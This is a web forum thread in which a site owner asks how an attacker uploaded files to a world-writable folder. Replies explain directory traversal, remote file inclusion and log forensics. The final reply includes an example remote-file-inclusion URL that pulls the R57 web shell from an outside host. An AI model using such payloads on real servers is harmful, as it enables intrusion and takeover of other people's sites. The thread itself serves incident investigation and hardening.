How can someone upload to a folder that is chmod 777 without having username and password to your server or ftp? This recently happened to me. And in order to secure against it entirely I was looking to find out in detail how its done so that I can set up ways to block from it happening again. Thanks in advance, TJ
There are still about a thousand ways this could happen. A good clue is to look at who owns the file. If it's owned as the same user that runs Apache (often something like wwwdata or nobody) then the chances are good that it's a security vulnerability in your web server / web application setup. If you are running PHP, that's the first thing I would target. PHP has made it very easy to code certain kinds of security vulnerabilities in the same way that C++ made buffer overflows hard to avoid. The two I'm thinking of right now are directory traversal and remote file inclusion. Another good clue can be found from the timestamp on the file. Look through all your logs for events that happened at the same time or just before it. Apache logs will tell you which script has the vulnerability, FTP/User Auth logs will tell you which user account was compromised, Syslog might be able to tell you if it was a buffer overflow in another service you are running on that box. If you have written anything in PHP yourself, it would be worth going over it again with a fine toothed comb. If you have some other software like wordpress it would be worth checking that it's updated to the most recent version. If the file is owned by someone else, not the Apache user, then the chances are better that either that user is secretly malicious and put that file there using their own account or (more likely) that their password was stolen through some other method unrelated to your server. check your user auth logs for failed login attempts and logins from unusual IP addresses. Good luck.
CHMOD 777 is not recommended as if the user's are allowed to upload anything, even a newbie in that case upload shell or similar to your server. CHMOD files 755 and be safe.
Thank you for your wise response.. I knew that and know that. However a client of mine didn't and for that I have secured his site. However I wanted to know how it is done remotely to someones server folder which is set 777 to see other possible ways to securing the same problem.
When there is a specific LFI or RFI vulnerability in one of your hosted sites, an attacker can easily place a shell like R57. ie: exploitedsite.org/index.php?name=http://shell.com/r57.txt? On this example, the attacker found a parsing error allowing remote file inclusions and executions on the index.php file when it calls for say PageB.php. Now that the attacker has their evil script attached, the shell has a built in FTP-like feature and they can easily manipulate folders and files that are all writable, executable and viewable globally. I hope that helps you understand a little.